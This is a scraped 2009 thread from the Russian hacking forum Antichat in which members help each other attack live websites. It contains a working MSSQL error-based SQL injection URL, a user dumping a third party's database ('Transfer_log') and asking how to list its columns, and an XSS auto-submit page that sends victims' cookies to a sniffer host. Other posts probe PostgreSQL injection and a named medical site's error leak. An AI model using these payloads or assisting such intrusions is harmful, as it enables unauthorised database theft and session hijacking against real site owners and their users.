Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.11.2009, 22:48
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'%2BCAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
|
|
|
15.11.2009, 22:53
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
ООООО молодец спс сработал
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the varchar value '^190539' to data type int.
респект
Где прочитат про Cast? |
|
|
|
15.11.2009, 23:31
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
http://msdn.microsoft.com/en-us/library/ms187928.aspx
|
|
|
|
16.11.2009, 11:13
|
|
Banned
Регистрация: 12.10.2009
Сообщений: 26
Провел на форуме:
60097
Репутация:
26
|
|
Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?
всем пионерам спасибо (: |
|
|
|
16.11.2009, 13:04
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
Сообщение от [i]
Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?
всем пионерам спасибо (: ручками чекни
|
|
|
|
16.11.2009, 13:48
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от [i]
Собсно в чём дело, надо дампнуть базу чегото там, как всегда очень ценного. Нашел уязвимость, ссылочку пихнул в утилитку для ленивых.
Всё хорошо, данные показала, БД, юзера, вывел все БД SQL, нашел нужную мне SNData, вывел табличку искомую Transfer_log, пытаюсь вывести из ней колонки, а в итоге нихера /: .
Так вот если бы небыло прав, я думаю я бы не смог вывести даже таблички.
Вопрос, каким способом мне получить нужную инфу ? Как отобразить колонки, нужной мне таблицы?
всем пионерам спасибо (:
хочешь - дай ссылку в личку, прочекаю
|
|
|
|
16.11.2009, 16:20
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Нужна небольшая консультация по XSS. XSS (пассивку) нашел , но немогу настроить frame.htm для сайта со сниффером.
Код:
<html>
<body>
<form name="xss" action="http://***.com.ua//index.jsp" method="post">
<input type="hidden" name="com" value="***">
<input type="hidden" name="***" value='1000">
<script>document.location.href="http://****.phpnet.us/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>
Что верно будет прописывать в сием файле и почему? Звездочки поставил для конспирации. |
|
|
|
16.11.2009, 16:44
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Кхм, подскажите пожалуйста, как посчитать кол-во таблиц при PostgreSQL inj из information_schema.tables? В гугле что-то нифига нету
PS: Тот же самый вопрос и про кол-во колонок в табле и про кол-во данных в табле
Спасибо
Стандартные count(*) не работают что-то
в этой мегатеме
https://forum.antichat.ru/threadnav35599-1-10.html
живу уже два часа, там есть всё - как то, как это, а как посчитать - нету
Последний раз редактировалось Pashkela; 16.11.2009 в 16:49..
|
|
|
|
16.11.2009, 17:01
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
сегодня чисто случайно искал информацию(по медицине) и нашел такое:
__http://www.cardiosite.ru/doctors/registration.aspx
здесь ошибка такая:
Код:
Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately.
Compiler Error Message: JS1241: Type 'ALP.Data.SqlData.QueryS' could not be found, is an assembly reference missing?
Source Error:
[No relevant source lines]
Source File: D:\sites\cardio\_controls\users\user-registration-solvay.ascx Line: 184
можно смело понять, что там IIS (ну и с MSSQL)
И хотел узнать - это что за ошибка и ошибка чего? IIS или SQL ? И как можно (или вобше можно) это использовать ?
P.S. Кстати, нажимая Show Detailed Compiler Output: можно получить еще кучу информации. там введены таблицы, да ? (UserIP, tbUserLastName, tbUserFirstName и т.д.)
Последний раз редактировалось B1t.exe; 16.11.2009 в 17:04..
|
|
|
|
16.11.2009, 17:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Pashkela, только count или limit
Если нетрудно, приведи пример хоть одной PostgreSQl инъекции, где вообще возможно посчитать кол-во таблиц в information_schema.tables и увидеть результат в сорцах страницы
лучше свой линк в студию 
Последний раз редактировалось l1ght; 16.11.2009 в 17:12..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
![Аватар для [i]](/avatars/avatar100185.gif){kind=avatar}
Похожие темы
Линейный вид
